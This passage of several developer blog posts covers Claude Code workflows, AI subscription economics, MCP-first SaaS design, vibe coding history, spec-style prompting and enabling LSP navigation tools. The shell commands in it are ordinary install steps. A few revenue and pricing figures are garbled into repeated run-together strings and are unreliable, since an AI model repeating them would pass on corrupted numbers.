This isn’t luck. It’s workflow design. But it reinforces the point from my original post: the subsidy rewards those who use it efficiently. Wasteful usage — open-ended exploration, resumed conversations, vague prompts — burns tokens at 10-50x the rate of focused work.

What This Means For You

If you read my original post and thought you had 18-24 months — you might, on paper. Anthropic has the cash. They have the compute commitments. They project 70billioninrevenueby2028and70billioninrevenueby2028and17 billion in free cash flow.

But the experience of using the product is degrading right now. Not in 18 months. Now.

Here’s what actually matters:

1. Ship before the experience degrades further. The window isn’t about pricing — it’s about capability per dollar. Today, $20/month gets you frontier model access that would have cost $500/month in API calls two years ago. That ratio is moving in the wrong direction as more users pile in.

2. Optimize your workflow. Start fresh sessions. Use CLAUDE.md and ARCHITECTURE.md. Be specific in your prompts. Avoid “Explore” and open-ended commands. These aren’t just productivity tips — they’re rate limit survival strategies.

3. Don’t build on the assumption of unlimited AI access. If your product or workflow requires constant frontier model access at current prices, you’re building on borrowed time. Build systems that work with AI but can degrade gracefully. Ship products that generate revenue independent of your development tools.

4. The enterprise pivot is coming. Anthropic’s enterprise revenue is already 80% of total. They have 300,000+ business customers, with large accounts (>$100K ARR) growing 7x year-over-year. Follow the money: consumer subscriptions are the loss leader. Enterprise is the business. When push comes to shove, enterprise gets the compute.

The Real Lesson

The leaked source code is a metaphor for the entire AI subsidy era.

For weeks, users were burning through rate limits at impossible speeds. They blamed themselves (”skill issue”), they blamed Anthropic (”fix your limits”), they blamed the model (”Claude got dumber”). The actual cause was a two-line bug in a caching function that nobody could see because the code was proprietary.

That’s the subsidy in miniature. You’re using a product where you can’t see the internals, can’t predict the costs, and can’t control when the rules change. The value is extraordinary — right now. But you’re a guest in someone else’s infrastructure, running on someone else’s VC money, subject to someone else’s capacity planning.

The smartest move hasn’t changed since three weeks ago. Ship. Build durable assets — products, content, audiences, skills — while the arbitrage is still available.

But do it faster than you planned. The window isn’t closing in 18 months.

The glass is already cracking.

Your SaaS Audience Doubled. Half of Them Are AI Agents.

Lakshmi Narasimhan — Mon, 16 Mar 2026 13:17:55 GMT

I was building the wrong product for about three weeks before I noticed.

I’d started x-intel as a SuperX clone — essentially a better analytics dashboard for X. Charts, follower graphs, engagement breakdowns, competitor tracking. The kind of thing where you look at a number, decide you feel bad about it, and close the tab.

And then I was chatting with Claude about the onboarding flow, and I said something like: “when I say onboarding, I mean the app gets my context and goals, then charts a strategy, periodically reviews it, and course corrects.”

Claude’s response stopped me: “That’s a fundamentally different product. Less ‘setup wizard’, more ‘AI strategist that lives in your X account.’“

I stared at that for a while. Then I realized I’d been building the audit view and calling it the product.

The dashboard isn’t the product. The dashboard is what humans look at after the AI already figured out what’s happening.

Build the MCP server first. The dashboard ships itself.

The problem is everyone’s still building it the other way.

What Everyone Is Still Building

Claude Code exists. The MCP protocol exists. Power users are already interacting with SaaS products through AI agents — not because you built that integration, but because they built it themselves using whatever API you exposed. They’re writing CLAUDE.md files that say “use the Stacksweller API to schedule posts” and just... doing it.

This is happening whether you designed for it or not.

The default SaaS in 2026 still ships dashboard-first: database → API → React. Users log in, stare at charts, try to draw conclusions. That model made sense when the only consumer of your product was a human looking at a screen.

That is no longer the only consumer of your product.

You can either build for this intentionally, or have it happen to you messily and then spend six months retrofitting.

The Reframe

Here’s what x-intel actually looks like when you build it right:

Intake — Claude asks who you are, what your niche is, what your X goals are, who your competitors are. You answer in plain English. Claude turns that into a structured profile using the set_profile tool.

Baseline — Claude pulls your current stats, analyzes your last 90 tweets, benchmarks against competitors. All MCP tools calling your data layer. No UI step required.

Strategy — Claude generates a content and growth plan: post frequency, best times, content formats, topics to lean into. Stored back in your database via MCP. The strategy exists before you’ve opened a browser.

Periodic review — A cron job runs weekly analysis, compares performance against the strategy, surfaces what’s working and what isn’t. Claude writes a summary. The dashboard shows that summary.

Course correction — Strategy updates based on data. Again, through tools. Again, before a human looks at anything.

The dashboard in this architecture isn’t the product. It’s an audit log. It shows you what Claude already figured out. Charts are passive — you still have to decide what to do. This tells you what to do, and then does it.

That’s a completely different product. “X-intel is your AI X strategist. Tell it your goals once. It watches your account, tracks competitors, and tells you exactly what to do next.”

That pitch destroys “SuperX but self-hosted.”

How to Actually Build MCP-First

The mechanics are simpler than they sound. Embarrassingly so.

Start by designing your tools for Claude, not for humans. Think about what Claude needs to do the job — not what a human wants to click on. Tool names, parameter shapes, return values should make sense to a language model. get_competitor_engagement_trend(handle, days=30) is better than getChartData(config). One of these tells Claude what it’s getting. The other makes Claude guess.

Here’s the part nobody mentions: if you have a data layer, you have an MCP server 70% built already. Wrap your existing queries as tools. The MCP protocol is just a contract — your database doesn’t move.

You don’t need to build an “AI feature.” You need a system prompt that gives Claude the right context, and tools that give it the right data. Claude is the strategist. Your MCP server is the strategist’s interface to your product. The actual work is thinking clearly about what Claude needs to know — not engineering.

Build the dashboard last, or thin. It’s a view layer. It shows stored strategies, weekly reviews, flagged anomalies. A log of decisions that were already made. Not a decision-support tool.

One Build, Two Audiences

Here’s the payoff that makes this worth doing even if you don’t care about being “AI-native.”

A well-designed MCP server makes your product useful to two completely different types of users with almost no additional work.

The first type opens the dashboard, reads the weekly strategy review, clicks to approve the suggested changes, and closes the tab. Normal SaaS behavior. They don’t know or care that Claude is behind it. They just want outcomes.

The second type connects your MCP server to their own Claude Code setup, writes a CLAUDE.md that describes how they want to use your product, and runs it themselves. These are your power users. They’ll do things with your product you never imagined, and they’ll tell everyone.

You still need the dashboard. Trials convert better with a UI. Not arguing otherwise. But the order matters: MCP layer first, dashboard second. The dashboard snaps on top in a weekend once the tools are solid. The reverse — retrofitting agent-friendly APIs onto a human-optimized interface — takes six months and still feels wrong.

Both audiences are real. Both are valuable. You get both by building the MCP layer correctly from the start, instead of bolting on an “AI integration” later when it’s expensive and awkward.

The dashboard-first founders will get there eventually. They’ll build the dashboard, grow slowly, and then spend six months retrofitting an API that was designed for human consumption into something an agent can actually use.

Or you build the MCP server first, ship a thin dashboard on top, and have both audiences from day one.

The dashboard ships itself. The strategist is Claude. The product is the tools you give it.

Stop building audit logs and calling them products.

Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Lakshmi Narasimhan — Tue, 10 Mar 2026 15:23:14 GMT

I do this thing at the end of every month where I look at my Claude usage stats and feel mildly guilty.

Not guilty enough to stop, obviously. But guilty in the way you feel when you’ve been eating at a nice restaurant and you suddenly realize your friend with the expense account has been covering all of it. You’d have ordered differently if you knew that at the start.

Here’s what I know: I pay $200/month for Claude Max. Based on what I actually do with it — multi-hour Claude Code sessions, agents running in parallel, research deep-dives, content pipelines chewing through tokens like a hungry golden retriever — the API-rate equivalent of my usage is somewhere between $600 and $900. Every month.

Anthropic is losing money on me. On you. On every developer who’s turned this into a real part of how they build.

This isn’t an accident. This is the plan. And it has an expiration date.

The Hemorrhage Is Real

I was reading Sebastian Raschka’s Build a Large Language Model from Scratch last week and stumbled into a footnote that sent me down a rabbit hole. He cites Lambda Labs: it would take 355 years to train GPT-3 on a single V100 datacenter GPU. On a consumer RTX 8000: 665 years.

I know, I know — “but they use thousands of GPUs in parallel.” Yes. And those thousands of GPUs cost tens of millions of dollars for a single training run. That’s before we talk about the ongoing cost of serving that model to every user who hits the API every day. Training is the capital expenditure. Inference — every time you actually use Claude — is the operating cost. I’m talking about the second thing. Both are obscene.

Let’s look at what’s actually happening, because the numbers are — and I say this as someone who’s seen a lot of startup math — genuinely unhinged.

OpenAI’s revenue went from $3.7 billion in 2024 to over $20 billion ARR by end of 2025. Ten times in two years. Sounds like they’ve figured it out. Except their own internal projections show losses of $14 billion in 2026 — against $13 billion in revenue. The revenue explodes. The costs explode faster. Microsoft has put in $13 billion. SoftBank committed $41 billion across various tranches. A 2026 funding round valued the company at $730 billion. None of this is profit. All of it is gap-filling.

Anthropic is nearing $20 billion in annualized revenue as of early 2026 — up from $1 billion at the start of 2025. Google has put in over $3 billion in equity, plus a cloud infrastructure deal described as “tens of billions” in compute. Amazon has committed $8 billion. The Series G closed at a $380 billion valuation. These are not investments in a profitable business. These are bets on essential infrastructure, placed by people who are terrified of the alternative.

Google’s own AI division is entirely subsidized by search advertising. They watched OpenAI nearly disrupt their core business and decided that losing money on AI is preferable to losing the company. You can’t really argue with the logic. You can appreciate that the logic benefits you.

Here’s what makes this particularly strange: the more usage grows, the worse the unit economics get. OpenAI’s gross margins collapsed from roughly 40% to 33% in 2025 because inference costs quadrupled as usage scaled. They’re getting less efficient per dollar as they get bigger. The burn isn’t winding down. It’s accelerating.

They’re all playing the same game — lose money now, win the market, figure out profitability later. You’ve seen this movie. AWS subsidized startups through aggressive discounting from 2008-2015 and built the most profitable cloud business in history. Uber burned billions subsidizing rides below cost for seven years. Every streaming service ran at a loss from 2015-2022 while racing to lock in subscribers before the music stopped.

The pattern: 5-8 years of heavy subsidies. Prices normalize. The land grab ends. Survivors optimize for margin.

AI is somewhere in year 3-4 of this cycle.

Why They’re Subsidizing You Specifically

Here’s the part most people miss.

It’s not just the gym membership model — yes, light users subsidize heavy users across the subscriber base. But for developers specifically, you serve a purpose that goes way beyond the math:

You evangelize. Every blog post about Claude Code, every Hacker News comment about your workflow, every Slack recommendation to a colleague — that’s marketing no ad budget can replicate. Authentic practitioner enthusiasm is worth more than a campaign, and they get it from you for free.

You’re the top of the enterprise funnel. The conversion path goes: you try Pro, you love it, you build something real, you show your team, your team shows leadership, leadership signs a $500K enterprise contract. That single deal is worth 2,500 Max subscribers. You’re not where the money is. You’re where the money comes from.

You stress-test the product. Power users find the edges. You file the bug reports casual users never hit. This feedback loop is genuinely expensive to replicate through formal QA — and you’re doing it gratis.

You build the ecosystem. Tutorials, repos, guides, courses. The content that helps a thousand other developers get value from the product? That’s unpaid work you’re doing for their platform.

You are, in the most literal sense, being paid for this in subsidized compute. It’s a trade. The question is whether you’re getting the better end of it.

(You are. Obviously. That’s the point.)

How Long Does the Window Stay Open?

Nobody knows. Anyone giving you a specific timeline is guessing, including me.

But the runway math doesn’t matter as much as the signals. Watch these:

Usage limits tightening. Already happening. “Unlimited” has gotten more creative in its definition. Rate limits appear. Fair use policies materialize. You’ve noticed.

Tier restructuring. The free tier gets worse. The basic tier gets capped. The premium tier develops features that used to be standard. The ladder shifts.

API price changes. When enterprise revenue is strong enough to sustain the business, the argument for subsidizing consumers weakens. Check the API pricing page periodically.

Enterprise-only features. When the best capabilities start requiring a sales call, the consumer product is no longer the growth driver.

My working model: 18-24 months of relatively stable economics. After that, genuine uncertainty.

The open-source wildcard could extend the window or change what “subsidized” even means. The gap between frontier models and the best open-weight models has compressed dramatically — we’re talking 6-12 months behind the frontier now, versus the 18-24 months people were citing a year ago. Running genuinely capable models locally on a Mac is already real, not theoretical. That’s a hedge against pricing pressure, but it doesn’t change the core argument. It just means the floor is higher than it was.

Either way: cheap access to frontier AI while the models keep getting dramatically better is the thing with the uncertain timeline. Don’t wait for a clear signal. By the time the signal is clear, the window is already closing.

What You Should Actually Be Building

This is where I have to resist the urge to give you a twenty-point tactical playbook. (I’m saving that for a separate post. Watch for it.)

The mental model is simple: use subsidized tools to build assets you own. Don’t just consume. Create.

For developers building SaaS, this means a few things specifically:

Ship the MVP, not the perfect version. Claude Code does 70% of the implementation and you do the system design and judgment calls. A SaaS MVP that would have taken three months solo two years ago takes a weekend now. These economics are extraordinary and they will not last forever. The price of “wait until it’s ready” is time you don’t have.

Build the content moat before everyone else does. Technical guides, deep-dives, tutorials on topics you actually know. This content ranks before your competitors get around to writing theirs. The window for content arbitrage — where AI-assisted quality beats raw human output at volume — is also temporary. The ones who started in 2025-2026 will own the long-tail traffic. The rest will write for audiences that already exist.

Develop taste. This is the skill that survives every model improvement and every price normalization. Knowing whether AI output is actually good — whether the code is maintainable, whether the architecture makes sense, whether the essay says something real — is something that cannot be automated. It gets more valuable as AI gets cheaper. Invest in it.

Build the audience. Newsletter subscribers, people who trust your recommendations, readers who show up when you publish. This is the asset that persists regardless of what happens to model pricing. You’re not renting audience from Anthropic. You own it.

The math I keep returning to: 18 months of focused effort with subsidized AI tools could produce 3-5 years of normal-pace output. The SaaS you’ve been procrastinating? You could ship three of them. The content backlog? Gone. The technical course based on your experience? Done.

That compounds. The skills sharpen. The audience grows. By the time pricing normalizes, you’ve already built the moat.

The Only Question That Matters

You pay 200/month.You′regetting200/month.You′regetting600-900/month in value. That arbitrage exists right now, today.

But the real arbitrage isn’t the monthly spread. It’s what you build during the window.

The people who win this period aren’t the ones who used Claude for the most impressive demo or the most clever prompt chain. They’re the ones who used cheap frontier AI access to build products, audiences, and content that persist after the subsidies end.

So: what are you shipping?

The clock’s running.

This post started as a rabbit hole triggered by a paragraph in Sebastian Raschka’s Build a Large Language Model from Scratch (Manning). His Substack is obviously worth following: @rasbt.

Will Vibe Coding Replace Developers? COBOL Already Tried.

Lakshmi Narasimhan — Sun, 08 Mar 2026 04:01:14 GMT

Last month I spent about forty minutes arguing with Claude Code about a rate limiter.

Not debugging a rate limiter. Not implementing one. Arguing. I had typed “add a usage limit to the free tier” and gotten back something that technically worked — it counted things and stopped you when you hit the limit — but was also completely wrong in about six different ways that I hadn’t specified because I hadn’t thought to specify them.

When does the counter reset? Daily? Monthly? On the billing cycle? What counts as a usage event — an API call, a feature access, a row stored? What happens at exactly 100%: hard block, soft warning, grace period where we beg you to upgrade? Do existing free users get grandfathered, or do they wake up tomorrow blocked from the thing they’ve been using for three months? What if someone hits the limit mid-checkout?

I hadn’t answered any of those questions. I had typed eight words and expected a computer to answer them for me. And the computer, being a computer (a very impressive one, but still a computer), had silently picked answers that seemed reasonable. UTC midnight resets. Hard blocks. No grandfathering.

Nobody wants UTC midnight resets. Nobody wants a hard block in the middle of checkout. And nobody, including me, had thought to say so.

That forty-minute argument was, in the precise technical sense, programming. Not in the syntax sense. In the real sense: figuring out exactly what I wanted the computer to do, in enough detail that it could actually do it.

Which brings me to Grace Hopper, and why the current panic about AI replacing developers is about sixty-five years old.

In 1959, Grace Hopper helped create a programming language called COBOL.

Common Business-Oriented Language. The name is the pitch. This isn’t for programmers — it’s for business people. The syntax looked like a business memo. You wrote ADD SALESTAX TO TOTALPRICE GIVING INVOICE-TOTAL. Sentences. Paragraphs. English words that a manager could theoretically read and understand and maybe, just maybe, write.

The promise was explicit: if the language is human enough, we won’t need programmers as intermediaries. Business users could specify their own software. The bottleneck — translating business requirements into code — would evaporate.

You know how this ends. COBOL created more programmer jobs than almost any technology before or since. Banks ran it for sixty years. Governments still run it. The programmer shortage it was supposed to prevent became one of the most persistent gaps in technology. The job postings for COBOL developers today — today, in 2026 — pay embarrassingly well because the people who understand those systems are retiring and there aren’t enough people to replace them.

The promise evaporated. The programmers did not.

Now, the obvious response here is: that was 1959. We were trying to replace programmers with verbose English-looking syntax. That’s completely different from vibe coding, which uses actual English, processed by a large language model that has ingested most of human knowledge. The comparison is unfair.

Fair enough. Let me make it fair.

After COBOL came 4th generation languages — the 70s and 80s promised that business users could generate reports and query databases without programmers. And they could! Until anything got complex, at which point someone had to specify what “complex” meant. That someone was, increasingly, a programmer with a different job title.

Then HyperCard in 1987. Anyone could build interactive applications — stacks, cards, buttons, scripts. And many people did! Wonderful things. And then the moment you wanted it to do something non-trivial, you needed to understand enough about conditional logic and data structures that you were, functionally, programming. The interface was friendlier. The underlying activity was identical.

Then no-code in the 2010s. Citizen developers. Visual workflows. Drag-and-drop databases. I watched three different companies I worked at try to use no-code platforms to “reduce dependency on engineering.” It reduced dependency on engineering the same way COBOL did: by creating a new class of technical specialists (now called “no-code developers” or “operations engineers”) who spent their days fighting with visual tools that couldn’t quite express what they needed to express.

Same experiment, sixty-five years, same result. Better interface, same bottleneck.

Here’s what I think is actually happening, and a comment on a Hacker News thread about agentic engineering said it more precisely than I can:

“When you get down to breaking down that problem... you become a programmer.”

The average person doesn’t know what their actual problems are in sufficient detail to get a working solution. Not because they’re not smart. Because the act of breaking a problem down into precisely specified steps that a computer can execute without ambiguity is programming — regardless of whether the syntax is COMPUTE TAX = PRICE * RATE or def calculate_tax(price, rate): return price * tax or “hey, write me something that calculates tax.”

The specification is the programming. The syntax is just notation.

Vibe coding is genuinely different from COBOL in one important sense: the interface change is more dramatic. Natural language processed by a model that can write working TypeScript from a vague description is qualitatively new. The gap between “what you type” and “what runs” has never been smaller.

But the gap between “what you type” and “what you actually wanted” is exactly as large as it’s always been. Possibly larger, because the tool is so capable that it confidently fills in every unspecified detail, silently, in ways that seem reasonable until they’re not.

My rate limiter reset at UTC midnight because I didn’t say it shouldn’t. The agent wasn’t wrong. I was underspecified.

What vibe coding has genuinely changed: the syntax, the boilerplate, the standard implementations of standard patterns are now basically free. A solo developer with Claude Code can ship in a week what used to take a team a month. That’s real leverage and I use it every day.

What hasn’t changed: the irreducible core of the job — figuring out with enough precision what you want the computer to do — is still entirely human work. And based on sixty-five years of running this experiment, there’s a reasonable argument that it’s definitionally human work. When you get specific enough about a problem to get a working solution, you’ve already done the programmer’s job. You might be doing it in plain English now instead of Python. You’re still doing it.

The developer job is changing. Less time on syntax, more time on the thinking that was always the hard part. More time arguing with your tools about exactly what you meant. More time specifying the edge cases before the tool invents its own.

If you’ve ever wanted to spend less time fighting TypeScript compiler errors and more time actually thinking about what you’re building — genuinely, that part is better now.

But the thinking is still yours.

The programmers are still here. They’ve been here since 1959. They’ll be here after vibe coding. They just keep getting better tools.

Learn from the evidence. It’s sixty-five years old and it’s not subtle.

What Chinese Factories Taught Me About Prompting Claude Code

Lakshmi Narasimhan — Tue, 03 Mar 2026 15:32:21 GMT

A few weeks ago, I fell down a Hacker News rabbit hole at 11pm. Someone had posted a manufacturing post-mortem — one of those beautiful, painful essays where a hardware founder documents exactly how badly they got burned.

This founder had designed a custom lamp. Spent months prototyping. Found a factory in Shenzhen. Shipped 500 units.

When the boxes arrived, the light-entry holes had been used as casting pour-points — the factory needed somewhere to pour the material, saw the holes, and went with it. The cable tails were two centimeters instead of ten. The knobs didn’t fit because the powder coating added thickness that nobody put in the spec. Everything technically matched the purchase order. Nothing actually worked.

I read that post-mortem three times. Then I read the top comment, which was one of those sentences that you immediately screenshot because it’s just too true:

“Anything you don’t specify will be done at minimum cost.”

I put my phone down. I looked at the ceiling. And then I thought about the email sender I’d had Claude Code generate that afternoon.

Let me tell you what I had asked for: “Send a welcome email to new users when they sign up.”

Let me tell you what I got: A function that sent emails. Technically correct. It looped over every new user and called the email API synchronously, one by one, waiting for each response before moving to the next. No rate limiting. No retry logic. No unsubscribe link — because I didn’t ask for one, and CAN-SPAM compliance wasn’t in the prompt. When I ran it against a list of 8,000 users, it fired all 8,000 requests in a tight loop, Gmail flagged the sending domain as a spam source within six hours, and my domain was blacklisted before I’d finished my coffee.

Everything sent. Nothing arrived.

I had been vibe coding with Claude Code for six months at that point, and I thought I was pretty good at it. I could get it to build things fast. I could chain prompts together. I had CLAUDE.md files and hooks and all the trappings of someone who knew what they were doing.

What I didn’t understand — what the Hacker News post-mortem forced me to understand — is that I had completely misidentified what kind of relationship I was in.

I thought I was pair programming with a senior engineer.

I was issuing purchase orders to a factory.

This distinction sounds philosophical. It isn’t. It has concrete, expensive implications for every vibe coding prompt you write.

A senior engineer fills gaps with judgment. If you say “build auth,” a good senior engineer asks: what are the scale requirements? What’s the threat model? Are we storing PII? They fill the spec gaps with professional standards because they have skin in the game — it’s their name on the code, their reputation on the line, their on-call rotation if it breaks at 3am.

A factory fills gaps with cost optimization. If the spec doesn’t say “cable tails must be 10cm,” the factory cuts them at 2cm. Not because they’re malicious. Because that’s 8cm of wire per unit times 500 units and someone’s margin depends on it. They’re perfectly rational. They’re just optimizing for something that has nothing to do with whether your lamp works.

Claude optimizes for “satisfies the prompt.” That’s the whole job. Your vague prompt is its permission to take shortcuts, and it will take them — not maliciously, but with the same rational efficiency as a factory floor supervisor who notices you didn’t specify the minimum acceptable wire gauge.

Here’s the thing about the hardware community that I find both humbling and enraging: they figured this out decades ago. They built an entire profession around it. These people are called sourcing agents, and their whole job is translating “I want a nice lamp” into a 47-page document covering material density, wire gauge, coating thickness, packaging dimensions, UV stability ratings, and what happens to the tooling if the order falls below minimum quantity.

Forty-seven pages. For a lamp.

In vibe coding, the sourcing agent is you. Most developers have been accidentally promoted to this role without realizing it. They’re still acting like they’re talking to a colleague. They’re actually running a factory and they’re skipping the quality control, the detailed specs, and the first-article inspection — all the boring stuff that hardware people do automatically because they’ve shipped enough garbage to know better.

I’ve started reading Hacker News manufacturing posts specifically to steal their frameworks for this. A few things that have genuinely changed how I write prompts:

Spec your constraints, not just your features. “Send welcome emails” is a feature request. “Send welcome emails via SES, rate-limited to 14 per second to stay under AWS sending limits, with exponential backoff and a max of 3 retries on failure, an unsubscribe link in the footer per CAN-SPAM, a plain-text fallback alongside the HTML version, and a hard skip for any address that has previously bounced or complained” is a spec. The difference isn’t intelligence — it’s the same way specifying wire gauge isn’t about distrusting your factory. It’s about understanding that factories don’t have opinions about wire gauge. They have margins.

Inspect the first batch before commissioning the full run. Hardware founders don’t ship the first production run to customers. They order samples. They measure every dimension with calipers. The good ones fly to Shenzhen and stand on the factory floor. The developer equivalent is reading the first 200 lines of generated code before asking Claude to build the next feature on top of it. Check the database schema before building the API on top of it. Read the auth flow before adding the permissions layer. This feels slow. It is much faster than discovering that the foundation is wrong after you’ve built four floors.

Specify what you don’t want. This one surprised me. Experienced sourcing agents reportedly spend half their spec document on exclusions. “No recycled plastic in structural components.” “No substituted components without written approval.” “No unlicensed firmware.” They’ve learned that a factory will always find the interpretation of the spec that costs them the least, so you have to close the doors. For prompts: “No inline styles. No TypeScript any types. No console.log for error handling. No SELECT * queries. No external dependencies unless they’re in the approved list.” The AI will not volunteer that it’s about to do these things. It will do them and move on.

Budget time for the spec, not just the build. Hardware founders allocate somewhere between 30-40% of their project timeline to specification work. The manufacturing part — the actual production — is the smaller slice. Vibe coders typically invert this. Five percent on the prompt, ninety-five percent on generating code and then debugging the surprising things that came out of a vague prompt. The debugging is expensive. The spec is cheap.

The thing I keep coming back to is that using Chinese manufacturers is incredible leverage. You can build a physical product without owning a factory, without specialized tooling knowledge, without decades of manufacturing experience. It’s genuinely one of the great unlocks of the modern economy. And it works — when you write the spec correctly.

Using Claude to write code is the same kind of leverage. You can build things without knowing every library, without remembering every API, without holding the entire codebase in your head at once. It works. When you treat it like what it is.

Your prompt is a manufacturing spec. The code is the factory output. The factory will be rational, efficient, and completely indifferent to whether your product actually works.

Write the spec accordingly.

Or enjoy your two-centimeter cable tails.

Claude Code Has Been Navigating Your Codebase Like a Tourist With No Map

Lakshmi Narasimhan — Mon, 02 Mar 2026 13:31:31 GMT

Here’s a thing that happened to me.

I was watching a Claude Code session — one of those where you hand the agent a task and then sit back to observe, feeling very enlightened and modern. The task was simple: find where user authentication was implemented and add a new field to the login flow.

The agent started grepping. authenticate. Then auth. Then login. Then loginUser. Then handleLogin. Each grep taking 3-8 seconds, scanning hundreds of files, returning walls of output full of comments, test fixtures, variable names that happened to contain the word “auth”, README lines I’d written two years ago and forgotten.

Six minutes in, the agent had read approximately 40% of my codebase and was confidently editing... a test helper that mocked authentication. Not the actual implementation. A mock. In a test file.

I watched it do this — a system with the reasoning capacity of a senior engineer, burning through context and API calls to do something that VS Code does when I hold Ctrl and click a function name. Something VS Code has done since 2016. Something that takes 50 milliseconds.

This is the state of the art in 2026. The most capable AI coding tool available, navigating your codebase the way your grandfather would navigate a foreign city: slowly, incorrectly, and with a lot of asking for directions from people who don’t know either.

There’s a fix. There are actually two fixes, and you need both. But first I want to explain why the problem is worse than it looks, because if you don’t understand the root cause, you’ll implement half of the solution and wonder why your agents still feel like babysitting.

Let me tell you about grep, and why it’s a disaster for code navigation specifically.

Grep is a text search tool. It finds patterns in text. This is genuinely useful for a lot of things. When you want to find every config file that mentions a database host, grep is perfect. When you want to find a log line, grep is perfect. When you want to navigate code semantically — find where a function is defined, trace what calls a function, understand the type hierarchy — grep is completely wrong for the job. It just happens to be the only hammer available, so everything looks like a nail.

Here’s the specific failure mode. When your agent searches for authenticate, it finds:

auth.service.ts:47:  async authenticate(user: User): Promise {
auth.service.ts:112: // authenticate is called after 2FA verification
auth.middleware.ts:23: // Middleware that calls authenticate() before protected routes
auth.test.ts:8:   describe('authenticate', () => {
utils/mock-auth.ts:31:   authenticate: jest.fn().mockResolvedValue(mockToken),
config/dev.ts:15:   authenticateWithMock: true,
README.md:234: ## How to authenticate

Seven results. One is the actual definition. The agent has to read all of them, reason about which one is the real thing, and then probably read the files surrounding each one to build context. Meanwhile, it’s consuming tokens, spending time, and building a picture of your codebase that’s assembled from grep outputs rather than from actual structural understanding.

The deeper problem: grep doesn’t understand the difference between a definition, a call site, a comment, a test mock, and a config flag. Those are fundamentally different things in the semantic structure of a codebase. A human engineer with IDE tooling can instantly distinguish them. An agent with only grep cannot — it has to infer the difference from text patterns and context, which it does imperfectly, which means it makes wrong edits, which you have to catch and correct, which is why agent sessions still require babysitting.

This is not a clever problem. We solved it for humans a long time ago.

In 2016, Microsoft did something quietly brilliant. They were building VS Code, and they had a problem: every editor had to implement language intelligence from scratch. Vim plugins, Emacs modes, IntelliJ — everyone was reimplementing the same understanding of what a TypeScript file meant, independently, badly, in incompatible ways.

Their solution was the Language Server Protocol. The idea: separate the “smarts” from the editor. Create a standard protocol where a language server — a standalone process that deeply understands a specific language — can talk to any editor that speaks the protocol. Build the language server once, correctly, and every editor gets the benefit.

A language server is not a text search tool. It parses your code into an Abstract Syntax Tree. It resolves types. It builds a symbol table — a complete map of every identifier in your codebase: what it is, where it’s defined, what it references, what references it. When VS Code shows you that authenticate is defined in auth.service.ts on line 47, it’s not searching for the string “authenticate.” It’s looking up authenticate in the symbol table and getting back a precise answer in under 50 milliseconds.

LSP was so obviously right that it became universal. Every serious editor implemented it. Every major language has a language server: pyright for Python, gopls for Go, typescript-language-server for TypeScript, rust-analyzer for Rust, clangd for C/C++. You almost certainly have at least one of these running on your machine right now.

The irony is that we gave AI agents trillion-parameter language models with remarkable reasoning capabilities, and then handed them grep for code navigation. Like building a Formula 1 car and fitting it with bicycle tires.

Claude Code can connect to these language servers. As of early 2026, this is an undocumented community workaround discovered via a GitHub issue — not an official feature. Which is funny, given how much it changes things. Enable it by adding to ~/.claude/settings.json:

{
  "env": {
    "ENABLE_LSP_TOOL": "1"
  }
}

Or export it in your shell profile if you prefer:

export ENABLE_LSP_TOOL=1

Then install the language server plugin for your stack. Claude Code has a plugin system for this — update the marketplace first, then install:

claude plugin marketplace update claude-plugins-official

# TypeScript/JavaScript
claude plugin install typescript-lsp
npm install -g typescript-language-server typescript

# Python
claude plugin install pyright-lsp
npm install -g pyright

# Go
claude plugin install gopls-lsp
go install golang.org/x/tools/gopls@latest

# Rust
claude plugin install rust-analyzer-lsp
rustup component add rust-analyzer

One gotcha that will silently waste your time: a plugin can be installed but disabled. An installed, disabled plugin does nothing — no LSP server registers at startup, no tools become available, no error. Just grep, same as before. After installing, run claude plugin list and confirm the status reads enabled. If it shows disabled, run claude plugin enable . Check this before you spend 20 minutes wondering why nothing changed.

Once enabled, your agent gets access to tools that most people don’t know exist:

goToDefinition — exact location of any symbol’s definition. Not “files that contain this string.” The definition. In ~50ms.

findReferences — every call site in your entire codebase. Every single one, sorted, precise, with file and line number.

workspaceSymbols — search your codebase by symbol name. Returns only actual code symbols (functions, classes, interfaces, variables) — not comments, not strings, not README lines.

hover — full type information for any identifier. When the agent is about to call a function, it can check the exact signature first rather than guessing.

diagnostics — real-time type errors. When the agent changes a function signature, the language server immediately reports every caller that’s now broken. In the same turn. Before the broken code ever runs.

That last one changes the loop entirely. Without LSP, the workflow is: agent makes a change → change breaks something → you run tests → tests fail → agent fixes it → might break something else → iterate. You’re discovering errors through tests, which means you’re discovering them late, which means multiple turns of cleanup for each mistake.

With LSP, the workflow is: agent makes a change → diagnostics immediately flag every type error caused by that change → agent fixes everything in the same turn. Error discovery goes from “whenever you run tests” to “immediately.” This alone is worth the two minutes it takes to set up.

Here’s the catch, and it’s not obvious until you run into it.

Even with LSP enabled and plugins installed and confirmed active, Claude still prefers grep. Grep is familiar, grep is in its training distribution, grep is what it reaches for first. Having the tools available doesn’t automatically mean Claude will use them.

Add this to your CLAUDE.md:

## Code Navigation

Prefer LSP tools over Grep for any code navigation task:
- Use workspaceSymbol to find symbols by name
- Use goToDefinition to find where something is defined
- Use findReferences to find all call sites
- Use diagnostics after any edit to catch type errors immediately

Use Grep only for text search: log messages, comments, config values,
string literals. Never use Grep to find function definitions.

Explicit instructions in CLAUDE.md override default behavior. This is a documented pattern: the tools exist, but you have to tell the agent to use them. Think of it as configuring the agent’s preferences, not patching the agent’s capabilities.

Now here’s the part where most people stop, and where they shouldn’t.

LSP gives your agent GPS. It knows how to navigate. findReferences from anywhere in the codebase will return exact results. But GPS without a destination is just a compass. Your agent still has to figure out where to go before it can navigate there efficiently.

Think about how an experienced engineer ramps up on a new codebase. They don’t start by grepping for things. They start by asking questions: where does the auth layer live? What’s the database access pattern? How do the services communicate? They build a mental model first, then navigate with precision.

Your agent has no mental model of your codebase unless you give it one. Every session starts cold. It has the code itself (too much to read exhaustively) and the tools to navigate it (useful once oriented) but no map. So it wanders.

The second layer is a structured description of your codebase’s architecture. Not documentation. Not a README. A map for the agent — written in terms of what the agent needs to know to get oriented quickly:

## Codebase Architecture

**Entry point:** src/server.ts bootstraps the app. All route registration happens here.

**Auth layer:** Everything authentication-related lives in /src/auth.
The entry point is `authenticate()` in auth.service.ts.
JWT handling is in auth.middleware.ts. Session storage is Redis via auth.session.ts.
Never bypass the middleware — it handles rate limiting and audit logging.

**Services:** Business logic in /src/services.
PaymentService, UserService, NotificationService are the big three.
Services never call each other directly — all cross-service communication
routes through the event bus in /src/events/index.ts.

**Database:** Prisma ORM. Never write raw SQL — always go through the Prisma client.
